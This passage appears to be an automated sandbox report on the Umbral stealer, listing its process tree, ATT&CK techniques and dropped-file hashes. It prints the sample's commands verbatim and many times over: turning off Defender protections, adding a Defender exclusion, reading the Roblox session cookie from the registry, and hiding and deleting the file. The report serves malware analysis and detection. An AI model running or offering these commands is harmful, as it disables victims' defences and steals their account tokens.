        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        19⤵
        
        PID:3424
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        19⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2524
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        19⤵
        Detects videocard installed
        
        PID:1648
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        19⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3908
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        20⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2532
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        17⤵
        Executes dropped EXE
        
        PID:4888
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        17⤵
        Executes dropped EXE
        
        PID:552
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        16⤵
        Executes dropped EXE
        
        PID:452
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        16⤵
        Executes dropped EXE
        
        PID:3772
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        15⤵
        Executes dropped EXE
        
        PID:5056
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        15⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:4300
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        16⤵
        
        PID:1748
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        16⤵
        Views/modifies file attributes
        
        PID:4676
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        16⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3324
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        16⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2800
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        16⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1004
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        16⤵
        
        PID:2504
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        16⤵
        
        PID:3228
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        16⤵
        
        PID:3512
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        16⤵
        
        PID:2640
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        16⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3812
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        16⤵
        Detects videocard installed
        
        PID:2464
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        16⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4376
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        17⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4532
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        14⤵
        Executes dropped EXE
        
        PID:2836
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        14⤵
        Executes dropped EXE
        
        PID:3808
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        13⤵
        Executes dropped EXE
        
        PID:1788
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        13⤵
        Executes dropped EXE
        
        PID:3308
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        12⤵
        Executes dropped EXE
        
        PID:2008
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        12⤵
        Executes dropped EXE
        
        PID:884
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        11⤵
        Executes dropped EXE
        
        PID:4692
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        11⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:1220
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        12⤵
        
        PID:1748
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        12⤵
        Views/modifies file attributes
        
        PID:3452
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        12⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4472
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        12⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4872
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        12⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4036
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        12⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4272
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        12⤵
        
        PID:1716
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        12⤵
        
        PID:2948
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        12⤵
        
        PID:3452
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        12⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2904
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        12⤵
        Detects videocard installed
        
        PID:2604
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2416
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        13⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3056
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        10⤵
        Executes dropped EXE
        
        PID:2988
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        10⤵
        Executes dropped EXE
        
        PID:4884
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        9⤵
        Executes dropped EXE
        
        PID:2416
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        9⤵
        Executes dropped EXE
        
        PID:1172
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        8⤵
        Executes dropped EXE
        
        PID:3628
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        8⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:1936
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        9⤵
        
        PID:2736
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        9⤵
        Views/modifies file attributes
        
        PID:4676
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        9⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3320
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4080
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1904
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        9⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3256
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        9⤵
        
        PID:3628
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        9⤵
        
        PID:4532
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        9⤵
        
        PID:4684
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2440
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        9⤵
        Detects videocard installed
        
        PID:4272
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        9⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2424
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        10⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4420
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        7⤵
        Executes dropped EXE
        
        PID:1972
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        7⤵
        Executes dropped EXE
        
        PID:4280
      - C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        6⤵
        Executes dropped EXE
        
        PID:3536
      - C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        6⤵
        Executes dropped EXE
        
        PID:4684
    - - C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        5⤵
        Executes dropped EXE
        
        PID:2988
    - - C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        5⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:4220
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        6⤵
        
        PID:916
      - C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        6⤵
        Views/modifies file attributes
        
        PID:4984
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3592
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4492
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4520
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4592
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        6⤵
        
        PID:1176
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        6⤵
        
        PID:1052
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        6⤵
        
        PID:3252
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1812
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        6⤵
        Detects videocard installed
        
        PID:3296
      - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3216
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4504
  - - C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
      "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
      4⤵
      Executes dropped EXE
      PID:3244
  - - C:\Users\Admin\AppData\Local\Temp\Umbral.exe
      "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
      4⤵
      Executes dropped EXE
      PID:4980
- - C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
    "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
    3⤵
    - Executes dropped EXE
    PID:4464
- - C:\Users\Admin\AppData\Local\Temp\Umbral.exe
    "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
    3⤵
    - Executes dropped EXE
    PID:4260
- C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
  "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
  2⤵
  - Executes dropped EXE
  PID:4384
- C:\Users\Admin\AppData\Local\Temp\Umbral.exe
  "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1420
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4880
- - C:\Windows\SYSTEM32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
    3⤵
    - Views/modifies file attributes
    PID:3100
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4104
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1176
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3308
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4296
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4676
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:4556
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:3864
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2792
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:2828
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Suspicious use of WriteProcessMemory
    PID:5116
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:2800

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Umbral.exe.log

Filesize
1KB

MD5
4c8fa14eeeeda6fe76a08d14e08bf756

SHA1
30003b6798090ec74eb477bbed88e086f8552976

SHA256
7ebfcfca64b0c1c9f0949652d50a64452b35cefe881af110405cd6ec45f857a5

SHA512
116f80182c25cf0e6159cf59a35ee27d66e431696d29ec879c44521a74ab7523cbfdefeacfb6a3298b48788d7a6caa5336628ec9c1d8b9c9723338dcffea4116

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\loader.exe.log

Filesize
654B

MD5
2ff39f6c7249774be85fd60a8f9a245e

SHA1
684ff36b31aedc1e587c8496c02722c6698c1c4e

SHA256
e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

SHA512
1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\loaderexp.exe.log

Filesize
871B

MD5
386677f585908a33791517dfc2317f88

SHA1
2e6853b4560a9ac8a74cdd5c3124a777bc0d874e

SHA256
7caf8779608c167ab6fa570df00c973aff6dee850bb63439770889a68c7cdae0

SHA512
876d2269e25a4b2754bdf2c7e3c410050f885d7e6bd8abce41c5fc74ae1f8c549b2266dd1588c750f614063f36c8a8e5008cea610505897d04e4ef5c3adc52d9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
88be3bc8a7f90e3953298c0fdbec4d72

SHA1
f4969784ad421cc80ef45608727aacd0f6bf2e4b

SHA256
533c8470b41084e40c5660569ebbdb7496520d449629a235e8053e84025f348a

SHA512
4fce64e2dacddbc03314048fef1ce356ee2647c14733da121c23c65507eeb8d721d6b690ad5463319b364dc4fa95904ad6ab096907f32918e3406ef438a6ef7c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
45ad40f012b09e141955482368549640

SHA1
3f9cd15875c1e397c3b2b5592805577ae88a96cb

SHA256
ea3b59172f1a33677f9cb3843fb4d6093b806d3a7cf2f3c6d4692f5421f656ce

SHA512
3de08f8affca1c1450088f560776cf3d65146cadac43c06eb922c7b3cea436e519966cf38458303ffeb1a58c53f8952cffda6c34216fda7594e014b516e83b33

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
e79b9a0937d9ca85dd2014446529d905

SHA1
63db9494fbe6901ab453d34053b685725d1f705d

SHA256
9fed633f3763c0292fc8e8458ad32c7461d9925a61b6b99081d27fb41bc68250

SHA512
0d49c74aa2cf3b024e3f2be5b181e451a78f86293db96fd729f671824ab97ab9eb1184fb2d7b4c8f5cc4ecca6f6868fd4fcd260611319d21492746ff65346440

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
96ff1ee586a153b4e7ce8661cabc0442

SHA1
140d4ff1840cb40601489f3826954386af612136

SHA256
0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8

SHA512
3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
36bb833bcefdd2f80a289fc681c87627

SHA1
4204fa10680f0a9c2699a9eb52709db1cd68e0b7

SHA256
52be5401760e6cc30c6018d277e7ce91aa262b3888297f76e95a20fdda8e2ae6

SHA512
233fbb528d3b7196fb967fff74e66dd589b6a302e97774a24fbeb971996aa6c1b17f24f19380873c976978552e245b3dd065cdb9d4133ce554c507d92f8778e1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
1a58f982c18490e622e00d4eb75ace5a

SHA1
60c30527b74659ecf09089a5a7c02a1df9a71b65

SHA256
4b7f800c0dea209162cc86627983993127eb20e3f8616646c41cb3ce15d9b39d

SHA512
ddab516a967783c5951717853aa5b3ef6dd5b442db50092888b2e7f3179fc68120fcde69a08d6ab280740eaadb6eadfc758c3118b52706f869e48ac1aebda480

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ec79fae4e7c09310ebf4f2d85a33a638

SHA1
f2bdd995b12e65e7ed437d228f22223b59e76efb

SHA256
e9c4723a5fe34e081c3d2f548a1d472394cc7aa58056fcf44ca542061381243a

SHA512
af9dda12f6bb388d826fe03a4a8beed9bda23a978aa55a2af6a43271660ee896a7ee3bcf2c4d2f1e6180902791d8c23560f1c2ec097a501d8c6f4f6c49075625

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
736626fa9fb9bd9558d1e3e09997f251

SHA1
85855b541c34acf7c937a54584fbfc9e73efbcc7

SHA256
e9a5adddb6d59595484a29216062feb1e18d7aa8b4e89b8d5a0ceb06399d53f3

SHA512
be1437dcb23013b4419f9f0068e924b84f4d5b322485d92e4b3a1c88b094bc6bcee042909c287e836dda77b024b31bee9512cb20ea005ba6dc1bbce33556c40d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
28ef595a6cc9f47b8eccb22d4ed50d6c

SHA1
4335de707324b15eba79017938c3da2752d3eea5

SHA256
3abd14d4fe7b5697b2fa84993e7183f4fd2580be5b4e5150da15ddda5a9560b9

SHA512
687b7849faa62a4dabc240b573afa163f0cda9a80be61cebe28ef1461777744d73b465ac92d065093228068540846e79c899445057f5b906f9b9fa9868132208

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
276798eeb29a49dc6e199768bc9c2e71

SHA1
5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

SHA256
cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

SHA512
